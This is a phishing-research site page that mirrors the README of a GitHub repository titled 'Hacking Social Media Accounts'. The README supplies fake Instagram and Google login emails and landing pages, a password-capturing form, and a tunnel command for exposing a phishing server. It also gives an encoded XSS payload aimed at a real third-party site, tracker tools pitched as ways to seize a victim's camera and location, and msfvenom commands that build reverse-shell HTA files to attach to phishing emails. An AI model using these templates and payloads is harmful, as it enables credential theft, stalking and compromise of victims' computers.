Skip to main content
PPPhishPondPhishing Tradecraft Intelligence

Attack · Detection · Validation

CampaignTradecraftInfrastructureDetectionResearchRadarNewsroomAboutSubscribe
CampaignTradecraftInfrastructureDetectionResearchRadarNewsroomAboutSubscribe

Research Desk

PhishPond

Phishing tradecraft research desk covering campaign analysis, adversary infrastructure, detection engineering, and validation workflows.

High signal for security teams who need tradecraft, not recycled filler.

Navigate

  • Home
  • Newsroom
  • Research
  • Subscribe

Signals

  • editorial@phishpond.dev
  • Research Mission & Ethics
  • Intel Brief
  • RSS Feed
  • Submit Research Tip
© 2026 PhishPond. Authorized security research use only.

GitHub RadarRed team tool

DevVj-1/Hacking-Social_Media-Accounts

🪝Hacking Social Media Accounts by using Phishing Mails (GoPhish) 🐬 Primary language: HTML. 184 stars.

HTML184 stars18 forkspushed Jul 27, 2026

Project links:Open GitHub projectBack to radar

README Preview

Fetched from GitHub

Hacking-Social_Media-Accounts

Hacking Social Media Accounts with Phishing Tool (GoPhish) 🐟

Image: Screenshot_2024-03-02-23-51-55-769_com google android youtube

<p align="left"> <img src="https://komarev.com/ghpvc/?username=DevVj-1&label=👁%20views%20%20&color=0e75b6&style=flat" alt="DevVj-1" /> </p>

⚠️ NOTICE:

🫵🏼 First time here? huh ( ≖‿ ≖ )🔪

Don't forget to hit the star button ⭐️ up there! I keep updating this repo with more phishing-related stuff over time

*so be sure to show some love!🩸🫶🏽*

⚠️ Like my content ?, then lets connect on Linkedin

Linkedin: linkedin.com/in/dev-vj1/

  • ※ If this tricks helps you, then don’t forget to share this repo with other! Hackers :)

<div align="center">

Image: 1 </div>

gophish-templates

Templates for an open-source Phishing Toolkit Some very basic configurations and templates to provide clean layouts usable in GoPhish, an open-source phishing toolkit. These layouts provided will also work with any other phising service as well, though they have only been tested in GoPhish.

Image: GoPhish

Installation ⚓

Installing the files is easy. Download the GoPhish client and log in at https://127.0.0.1:3333/ with the standard credentials visible in the command line. There, the various templates and landing pages can be configured with my html configurations.

Image: 12 04 2025_10 08 00_REC

Features 🎣

  • Instagram Landing Page
  • Instagram Mail Template
Instagram Landing Page 💈

A very basic Instagram landing page which attempts to have people enter user details.

Link: https://www.instagram.com/accounts/login/ Title: Login • Instagram

Image: instagrampage

Instagram Mail Template 💈

A very basic Instagram mail which attempts to have people click on a link to secure their account.

Subject: New Instagram Login Sender: security@mail.instagram.com

Image: instagrammail

Google Chrome OS Mail Template 💈

<div align="center">

Image: 1 </div>

A very basic Google mail, which notifies the user about a login.

Subject: New Sign In Sender: no-reply@accounts.google.com

Image: chromemail

Free web port Forwarding...

Image: port-Forwarding

💻 Playit.gg TCP Reverse Shell Port Forwarding

🛑 YOUTUBE Video: https://youtu.be/uoOuLqkmidU?si=Lv2b5K2UmRBsGnLi

⚓ https://github.com/DevVj-1/Hacking-Social_Media-Accounts/blob/main/Shell_Port-Forwarding.md

Just 👇 run this command ₊˚🎐
ssh -R 80:localhost:8080 nokey@localhost.run
http://localhost.run/

Image: green

Q/A ❓

Q1 Submitted Form Data Isn't Being Captured (o_O)?

To capture data submitted through a landing page, you need to create an HTML <form> element on your landing page that has a few specific properties: Here is a minimal example <form> element which captures data:

<form action="" method="POST">
    <input name="username" type="text" placeholder="username" />
    <input name="password" type="password" placeholder="password" />
    <input type="submit" value="Submit" />
</form>
There are a few things to note about this form:
  • The action is "" so that form submissions are directed to your phishing page and, therefore, to your Gophish server
  • The form submission method is POST
  • Each input which you expect to see in Gophish has a name attribute

Each of these should be checked when troubleshooting HTML forms that don't appear to be sending data correctly. If you still aren't seeing your form submitted correctly, you may need to review and remove any Javascript on the page interfering with the form submission. Finally, ensure that when saving the landing page that you have both the "Capture Submitted Data" and "Capture Passwords" (if appropriate) options checked. Otherwise, Gophish will remove the name attributes from your inputs so they aren't submitted with the form.

Q2 How i setup Phishing Campaing ? ¯\_(ツ)_/¯

You can read this article to get more information about how to set up a phishing campaign!

https://www.hackercoolmagazine.com/gophish-setup-a-phishing-campaign/

# #

🚀 How To HOst a Deface WebPage by Exploiting XSS Vulnerability

preview 👉: https://prdb.pk/front/search/ICA8aWZyYW1lIHNyYz0iaHR0cHM6Ly9yYW1lZDgwMDQ4LnB5dGhvbmFueXdoZXJlLmNvbS8iICBzdHlsZT0iYm9yZGVyOiAwOyBwb3NpdGlvbjpmaXhlZDsgdG9wOjA7IGxlZnQ6MDsgcmlnaHQ6MDsgYm90dG9tOjA7IHdpZHRoOiAxMDAlOyBoZWlnaHQ6MTAwJSI+

Image: Team_Valhalla

🛑 Youtube Video Tutorial: https://youtu.be/znlRD3A-1hY?si=lYkZUJLU9DqOQTej

✍️ Writeup: https://github.com/DevVj-1/Hacking-Social_Media-Accounts/blob/main/Deface-Web-by-exploiting-xss.md

OSINT (Open-source Intelligence) 🔍

Reverse Email

https://usersearch.com/search_results

MOBILE Number TRACKER 🖁

A service specifically designed to Track Mobile Number, Location on Google Map including information such as the owner's Name,Location,Country,Telecom provider.

EMOBILETRACKER : https://www.emobiletracker.com/

※ https://inteltechniques.com/tools/Username.html 🔎 Freely available online open source investigation toolkit.🕵️‍♂️

Image: OSINT

https://docs.google.com/spreadsheets/d/18rtqh8EG2q1xBo2cLNyhIDuK9jrPGwYr9DI2UncoqJQ/edit?pli=1#gid=1700243466
https://map.malfrats.industries/

Image: ojeon6pzrkqivmrydatu

Ultimate-osint-collection : https://start.me/p/DPYPMz/the-ultimate-osint-collection **https://start.me/p/L1rEYQ/osint4all

GeoOSINT 🔎

Realtime Movement (MISC)

Image: Screenshot 2025-05-16 223734

Mappillary is also a great service providing tons of images from transports (Cars, Train, etc) Can be usefull to identify locations where there is no roads (ex : trains)

※ https://www.mapillary.com

Tools for viewing past aerial imagery

Image: Screenshot 2025-05-16 225848

※ https://livingatlas.arcgis.com/wayback/

Views realtime map (streetview, satellite, maps)

Image: Screenshot 2025-05-16 230753

※ http://data.mashedworld.com/dualmaps/map.htm

Social Media Verification

🌐 A Beginner's Guide to Social Media Verification 📌

https://www.bellingcat.com/resources/2021/11/01/a-beginners-guide-to-social-media-verification/

※ Username searching...🔍

https://whatsmyname.app/

Tracking via phishing links...

Image: find

https://github.com/thewhiteh4t/seeker

※ Online Alternative ※

Popular online Tracker tools

1) Create a Tracker Link : https://grabify.link/

2) Create a Tracker Link : https://tracker.iplocation.net/

3) Telegram BOT 🎯💯:- @Camera_location_sf1_bot

Image: Screenshot 2024-12-29 225659

You can Hack:

🎯 Front Camera 📷

🎯 exact Location with map 📍

🎯 Phone number

🎯 Sim Type

🎯 IP, Battery, and many more...

Image: Screenshot 2025-01-12 154944

Q) What is baiting technique? Baiting is a variant of social engineering where the perpetrator lures the victim with attractive offers or rewards. This tactic tricks the victim into unintentionally downloading malware into their system or revealing confidential personal or organizational information

Image: Screenshot 2024-12-29 225751

How do you Track an Email Address?

I assume that many of you are wondering how is it possible to trace an email address and find the location of an email? a email header contains a lot of information about the email itself as well as the sender!📌

How To Copy Email Header ❓

https://it.umn.edu/services-technologies/how-tos/gmail-view-email-headers

( Copy full email header from any email that you would like to trace back and find email sender location)

https://www.ip-tracker.org/email/finder.php

How do you Track an Suspicious IP address

You can easily lookup, track and find IP location. Simple enter the IP address or domain into input box to start finding its location, as well as additional relevant IP or DNS information.

https://www.ip-tracker.org/

Geolocation Investigation maps (OSINT)

Allows you to search for mapped information in the Open Street Map database using command-line queries, making it an unrivalled geolocation tool.

  • Map: https://overpass-turbo.eu/
  • Guide: https://publication.osintambition.org/3-ways-to-use-overpass-turbo-if-you-dont-know-overpass-query-language-2f748b0fb66b

Image geolocation Investigation with AI tool

This tool looks at things like plants, building styles, and weather in the picture and compares them to a large collection of photos that have known locations.

  • Geospy: https://geospy.ai/

<div align="center">

Image: 1 </div>

Meterpreter as Persistence Backdoor 💀⃤

<div align="center">

Image: 3 </div>

  • [MSF-Persistence-Backdoor](https://github.com/DevVj-1/Hacking-Social_Media-Accounts/blob/main/MSF-Persistence-Backdoor.md):
  • [Metasploit Unleashed](https://www.offsec.com/metasploit-unleashed/): More Hacking Tricks and commands 👁️⃤

How to Compromise Windows 🦋 system

*You can add this payload to your phishing email. When the victim installs & open this malicious file, you'll get your shell 🐚*

HTA Attack in Action

We will use msfvenom to turn our basic HTML Application into an attack, relying on the hta-psh output format to create an HTA payload based on PowerShell. In Listing 11, the complete reverse shell payload is generated and saved into the file evil.hta.

msfvenom -p windows/shell_reverse_tcp LHOST=<your tun0 IP> LPORT=<your nc port> -f hta-psh -o ~/evil.hta
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your tun0 IP> LPORT=<your nc port> -f hta-psh -o ~/evil64.hta

Exploiting Microsoft Windows using MS Word Macro [ Manually ] 🐓

The Microsoft Word macro may be one the oldest and best-known client-side software attack vectors.

Microsoft Office applications like Word and Excel allow users to embed macros, a series of commands and instructions that are grouped together to accomplish a task programmatically. Organizations often use macros to manage dynamic content and link documents with external content. More interestingly, macros can be written from scratch in Visual Basic for Applications (VBA), which